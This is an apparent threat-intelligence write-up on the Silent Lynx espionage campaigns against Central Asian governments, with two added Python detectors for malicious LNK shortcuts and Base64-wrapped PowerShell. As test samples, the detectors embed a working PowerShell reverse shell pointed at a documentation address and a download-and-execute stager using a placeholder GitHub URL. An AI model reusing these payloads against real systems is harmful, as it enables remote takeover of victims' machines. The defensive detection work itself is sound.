Silent Lynx is a sophisticated threat cluster first observed in 2024 that continues to run targeted intelligence-gathering operations against government organizations across Central Asia. Security researchers at Seqrite are credited with assigning the “Silent Lynx” label to this activity cluster, helping to separate it from a tangle of other labels that have been used by various vendors and observers, including names such as YoroTrooper, Sturgeon Phisher, and ShadowSilk. This naming clarity has assisted analysts in correlating activity and differentiating it from overlapping campaigns.
The group has built a reputation for carefully tailored spear-phishing campaigns that impersonate officials and other trusted figures. Attack messages are typically aimed at government employees and include weaponized attachments whose purpose is the collection of sensitive information.
Seqrite’s reporting highlights that the threat actors often rely on fabricated communications about high-level summits and diplomatic meetings as the initial lure, making the messages look timely and relevant to their targets.
Researchers observed that many of Silent Lynx’s operations appear to be assembled quickly and pragmatically, yet they remain narrowly focused on diplomatic and governmental personnel connected to international meetings. This pattern suggests the campaigns prioritize speed and contextual believability to increase the likelihood of engagement from busy officials.
The targeting spans multiple Central Asian countries — Seqrite specifically mentions Tajikistan and Azerbaijan — and also includes activity affecting systems in Russia and China where relevant diplomatic and infrastructure relationships intersect.
Seqrite identified two separate campaigns during 2025 that shared common techniques and tooling but targeted different geopolitical relationships. One campaign, discovered in October 2025, focused on diplomatic entities engaged in preparations for a Russia–Azerbaijan summit.
The other campaign targeted organizations tied to China–Central Asia relations. Taken together, the timing, subject matter, and consistency of the lures indicate a coordinated espionage effort motivated by geopolitical intelligence objectives rather than by financial gain.
The initial infection vector typically begins with a compressed RAR archive crafted to look innocuous and relevant to the intended recipients. Filenames are often written in Russian and designed to appear as benign documents, for example using titles that translate to “Plan for Development of Strategic Cooperation.”
When recipients extract the archive, they find a malicious Windows shortcut (LNK) file rather than a document. The shortcut launches PowerShell, which retrieves obfuscated scripts hosted in public GitHub repositories and runs them.
Technical analysis of the LNK artifacts revealed working-directory metadata that pointed to a desktop path in Russian (C:\Users\GoBus\OneDrive\Рабочий стол). Seqrite used this metadata as an investigative pivot to link multiple incidents and track the actor’s recurring infrastructure and campaign patterns.
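The working-directory pivot described above comes from the StringData section of the MS-SHLLINK format, and the same section carries the PowerShell arguments the lure executes. The parser below is an added example (not Seqrite's tooling and not a Silent Lynx sample): it reads the header and StringData fields, then applies a few triage checks. The shortcut it parses is constructed in memory, with a placeholder GitHub URL; the only value taken from the report is the working-directory string.

```python
"""Parse the StringData of a Windows shortcut (.lnk, MS-SHLLINK) and triage it.

Added example. The sample shortcut is constructed in memory below; it is not a
Silent Lynx artifact, and the GitHub URL in it is a placeholder.
"""
import struct

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # CLSID_ShellLink
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the console window minimized

# LinkFlags bits that decide which sections follow the 76-byte header
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Working-directory string Seqrite reported as the pivot for this cluster (lower-cased)
KNOWN_OPERATOR_WORKDIRS = {r"c:\users\gobus\onedrive\рабочий стол"}


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand, LinkFlags and every present StringData field; ValueError if malformed."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a ShellLink header")
    if data[4:20] != LINK_CLSID:
        raise ValueError("LinkCLSID mismatch")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = HEADER_SIZE
    # Skip the optional binary sections that sit between the header and StringData.
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    out = {"flags": flags, "show_command": show_command}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        if pos + 2 > len(data):
            raise ValueError(f"truncated before {key}")
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        pos += 2
        raw = data[pos:pos + count * width]
        if len(raw) != count * width:
            raise ValueError(f"truncated {key}")
        pos += count * width
        out[key] = raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252")
    return out


def triage(data: bytes) -> list:
    """List the reasons a shortcut looks like a script launcher rather than a document."""
    lnk = parse_lnk(data)
    target = lnk.get("relative_path", "").lower()
    args = lnk.get("arguments", "").lower()
    reasons = []
    if target.endswith(("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe")):
        reasons.append("target is a script interpreter")
    if any(k in args for k in ("iex", "invoke-expression", "downloadstring", "invoke-webrequest", "iwr ")):
        reasons.append("arguments fetch and evaluate remote code")
    if "github" in args:
        reasons.append("stage hosted on GitHub")
    if "-w hidden" in args or "-windowstyle hidden" in args or lnk["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("console hidden from the user")
    if lnk.get("working_dir", "").lower() in KNOWN_OPERATOR_WORKDIRS:
        reasons.append("working directory matches the reported operator path")
    return reasons


def build_sample_lnk(target: str, working_dir: str, arguments: str, show_command: int = 1) -> bytes:
    """Constructed test artifact: a Unicode .lnk with RelativePath, WorkingDir and Arguments."""
    header = bytearray(HEADER_SIZE)
    struct.pack_into("<I", header, 0, HEADER_SIZE)
    header[4:20] = LINK_CLSID
    struct.pack_into("<I", header, 20, HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE)
    struct.pack_into("<I", header, 60, show_command)

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return bytes(header) + string_data(target) + string_data(working_dir) + string_data(arguments)


LURE_LNK = build_sample_lnk(  # constructed; mirrors the shape the report describes
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"C:\Users\GoBus\OneDrive\Рабочий стол",
    "-w hidden -nop -c \"iex (iwr https://raw.githubusercontent.com/example-org/example-repo/main/stage.ps1)\"",
    show_command=SW_SHOWMINNOACTIVE,
)

if __name__ == "__main__":
    print(parse_lnk(LURE_LNK)["working_dir"])
    for reason in triage(LURE_LNK):
        print("-", reason)
```

The working-directory check is deliberately an exact match on a known string rather than a heuristic: a Russian-language desktop path is common on legitimate machines, so on its own it is an attribution pivot, not a detection. The interpreter-target, hidden-window and remote-evaluation checks are what should drive blocking at the mail gateway.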
The PowerShell code the LNK retrieves is Base64-encoded and implements a reverse shell that connects back to operator-controlled servers, typically on TCP port 443 so that the connection looks like ordinary HTTPS at the port level.
Once decoded and executed on the victim host, the payload holds open a persistent TCP channel to the command-and-control infrastructure. A raw TCP session on 443 passes port-based filtering, but it is visible to any inspection that checks for a real TLS handshake. Operators send commands down the channel, the implant runs each one, most often through PowerShell's Invoke-Expression, and the output is written back over the same socket.
This interactive capability gives operators remote command execution, data collection, and the ability to stage subsequent payloads.
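Because both the lure and the downloaded stage lean on Base64 wrapping, a useful detection is to peel those layers off process command lines before matching on the reverse-shell traits just described (TcpClient to port 443, a stream read loop, Invoke-Expression). The script below is an added example, not part of the Seqrite report: it decodes -EncodedCommand blobs (UTF-16LE) and inline FromBase64String blobs, then scores every recovered layer. The three command lines it runs over are constructed here; the reverse-shell text is a generic PowerShell pattern pointing at a documentation address, and the GitHub URL is a placeholder.

```python
"""Peel Base64 layers off PowerShell command lines and flag reverse-shell or loader traits.

Added example. The sample command lines are constructed, not captured from the campaign.
"""
import base64
import re
from typing import List, Optional

# -EncodedCommand / -enc / -e <blob>: Base64 of a UTF-16LE script (PowerShell's own convention)
ENC_CMD = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# [Convert]::FromBase64String('<blob>'), the inline wrapping used by staged loaders
FROM_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)

INDICATORS = {
    "tcp_client": re.compile(r"net\.sockets\.tcpclient", re.I),
    "port_443": re.compile(r"tcpclient\s*\(\s*['\"]?[\w.\-]+['\"]?\s*,\s*443\s*\)", re.I),
    "stream_io": re.compile(r"\.getstream\(\)", re.I),
    "invoke_expression": re.compile(r"\b(?:invoke-expression|iex)\b", re.I),
    "downloader": re.compile(r"downloadstring|invoke-webrequest|\biwr\b", re.I),
}


def _b64_to_text(blob: str, utf16: bool = False) -> Optional[str]:
    """Decode one Base64 blob to text, or None if it is not valid Base64."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    # -enc blobs are always UTF-16LE; inline blobs are usually UTF-8 unless NULs show up.
    if utf16 or b"\x00" in raw:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def decode_layers(cmdline: str, max_depth: int = 3) -> List[str]:
    """Return the command line plus every Base64 layer recovered from it, outermost first."""
    layers, frontier = [cmdline], [cmdline]
    for _ in range(max_depth):
        found = []
        for text in frontier:
            found += [s for m in ENC_CMD.finditer(text) if (s := _b64_to_text(m.group(1), utf16=True))]
            found += [s for m in FROM_B64.finditer(text) if (s := _b64_to_text(m.group(1)))]
        if not found:
            break
        layers += found
        frontier = found
    return layers


def analyze(cmdline: str) -> dict:
    """Match indicators across all decoded layers and return a verdict."""
    layers = decode_layers(cmdline)
    hits = {name for text in layers for name, rx in INDICATORS.items() if rx.search(text)}
    if {"tcp_client", "invoke_expression"} <= hits:
        verdict = "reverse-shell"
    elif {"downloader", "invoke_expression"} <= hits:
        verdict = "remote-script-loader"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": sorted(hits), "layers": len(layers)}


# Constructed samples. 192.0.2.10 is a documentation address; the GitHub URL is a placeholder.
REVERSE_SHELL_PS1 = """
$c = New-Object System.Net.Sockets.TCPClient('192.0.2.10', 443)
$s = $c.GetStream(); [byte[]]$b = 0..65535 | % {0}
while (($n = $s.Read($b, 0, $b.Length)) -ne 0) {
  $cmd = [Text.Encoding]::ASCII.GetString($b, 0, $n)
  $out = (Invoke-Expression $cmd 2>&1 | Out-String)
  $w = [Text.Encoding]::ASCII.GetBytes($out); $s.Write($w, 0, $w.Length)
}
"""
STAGER_PS1 = ("IEX (New-Object Net.WebClient).DownloadString("
              "'https://raw.githubusercontent.com/example-org/example-repo/main/stage.ps1')")


def _b64(text: str, utf16: bool = False) -> str:
    return base64.b64encode(text.encode("utf-16-le" if utf16 else "utf-8")).decode()


SAMPLE_CMDLINES = {
    "benign": 'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Temp"',
    "inline_blob": ('powershell.exe -w hidden -nop -c "iex ([Text.Encoding]::UTF8.GetString('
                    "[Convert]::FromBase64String('" + _b64(REVERSE_SHELL_PS1) + "')))\""),
    "encoded_command": "powershell.exe -w hidden -enc " + _b64(STAGER_PS1, utf16=True),
}

if __name__ == "__main__":
    for label, line in SAMPLE_CMDLINES.items():
        print(label, analyze(line))
```

The layer count is worth logging alongside the verdict: a benign administrative command rarely needs more than one encoding layer, so depth alone is a cheap secondary signal even when the indicator regexes miss a renamed cmdlet.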
Seqrite’s telemetry and analysis uncovered three principal implants deployed across the campaigns. The first, dubbed Silent Loader, functions as a lightweight downloader written in C++ whose role is to fetch and stage additional components.
The second implant, Laplas, provides a TCP and TLS-capable reverse shell for resilient remote access. The third major component, SilentSweeper, is a .NET-based implant that is capable of extracting embedded PowerShell scripts from its resource section and executing them on demand.
SilentSweeper’s functionality includes accepting runtime arguments such as -extract, which writes the embedded PowerShell to disk, and -debug, a flag used for troubleshooting during deployment. Analysts noted that SilentSweeper reads a resource named qw.ps1, executes its contents, and subsequently pulls down other reverse-shell payloads to extend functionality. This modular design enables the operators to maintain a small initial footprint while delivering more capable tools as needed.
Beyond these bespoke implants, operators also deployed Ligolo-ng, an open-source tunneling utility, to create network tunnels that facilitate lateral movement and broaden remote connectivity. The presence of Ligolo-ng allowed the adversary to pivot freely and execute commands across a wider set of compromised hosts.
While the campaign demonstrates a level of operational sophistication in tooling and multi-stage delivery, Seqrite’s report also calls out a number of OPSEC mistakes — metadata artifacts, reuse of infrastructure, and predictable working-directory strings — that helped researchers attribute and cluster the activity.
Overall, the Silent Lynx campaigns represent a focused and persistent espionage program that leverages contextual social engineering, multi-stage payloads, and a mixed toolset of bespoke and open-source components to achieve long-term access to high-value diplomatic and governmental networks.
Despite the actor’s operational shortcomings that exposed clues for defenders, the combination of believable lures, modular implants, and tunneling capabilities makes this a credible threat to organizations engaged in international diplomatic and infrastructure planning.
